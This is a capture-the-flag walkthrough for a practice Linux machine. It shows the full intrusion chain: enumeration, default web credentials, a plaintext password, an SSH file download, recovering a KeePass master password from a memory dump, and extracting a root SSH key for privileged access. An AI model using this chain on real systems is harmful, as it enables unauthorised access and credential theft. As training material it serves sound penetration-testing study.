Keeper
Machine Information
Keeper is an easy-difficulty Linux machine that features a support ticketing system still running with default credentials. Enumerating that service reveals clear-text credentials that give SSH access. With SSH access we can obtain a KeePass database together with a memory dump of the KeePass process, and the dump can be leveraged to recover the master password. With access to the KeePass database we can read the root SSH key, which is used to gain a privileged shell on the host.
Writeup
Enumeration
nmap -sCV -T5 10.129.229.41

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Browse to the site on port 80. It refers to a hostname rather than the IP, so map the IP to that domain in /etc/hosts:

echo "{IP} {domain}" | sudo tee -a /etc/hosts

The site is Request Tracker. Look up its default credentials and log in with them.
User Flag
In the top bar, go to User > Select and click the listed username. Scrolling down the user's page reveals a password stored in plain text.
Connect over SSH with those credentials and read the user flag.
Root Flag
Download the zip file from the host over SSH:

sshpass -p 'Welcome2023!' scp -v lnorgaard@keeper.htb:/home/lnorgaard/RT30000.zip .

Unzip it; it contains a .dmp file (a KeePass process memory dump) and a .kdbx file (the KeePass database).
Search on Google for "Keepass dump vulnerability poc" and I got this PoC.
Running it against the .dmp file prints this:

drgd med flde

The PoC cannot recover the first character of the master password, and the non-ASCII letters are lost as well, so the output is only a fragment. Searching for that fragment gives the full phrase:

Rødgrød med fløde
Now open the .kdbx file with kpcli, using the recovered phrase as the master password:

kpcli --kdb passcodes.kdbx

Go to password/Networks and run show -f 0; the entry's Notes field contains an SSH private key in PuTTY (.ppk) format. Copy everything after Notes into a file and delete the leading spaces on each line, otherwise puttygen will not parse it. Then convert the PuTTY key to OpenSSH format:

puttygen key -O private-openssh -o rsa

Connect over SSH as root with the key we just converted:

ssh root@{IP} -i rsa
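The manual clean-up above (strip the leading spaces, then convert) is easy to get wrong, so here is an added shell example that is not part of the original writeup. It strips leading whitespace from every line of the pasted text, checks that the result actually starts with a PuTTY key header before anything else touches it, and sets the 600 permissions that ssh insists on for a private key. The file names "key" and "rsa" follow the writeup; the header check and the permission step are additions.

```shell
# Added example (not from the original writeup): tidy a PuTTY key that was
# pasted out of the KeePass Notes field before giving it to puttygen/ssh.

strip_leading_ws() {
    # Remove leading spaces/tabs from every line (the writeup does this by hand).
    sed 's/^[[:space:]]*//'
}

is_ppk() {
    # Succeed only if the first line of $1 looks like a PuTTY private key header.
    head -n 1 "$1" | grep -q '^PuTTY-User-Key-File-'
}

prepare_ppk() {
    # $1: file with the pasted key text, $2: cleaned output path.
    strip_leading_ws < "$1" > "$2"
    if ! is_ppk "$2"; then
        echo "not a PuTTY key file: $2" >&2
        return 1
    fi
    # ssh refuses a private key that is readable by other users.
    chmod 600 "$2"
}

# Usage, assuming the pasted Notes text was saved as pasted.txt:
#   prepare_ppk pasted.txt key && puttygen key -O private-openssh -o rsa
```

The header check matters because puttygen's error message on a file with stray indentation is not obvious; failing fast on a malformed file saves a round of guessing.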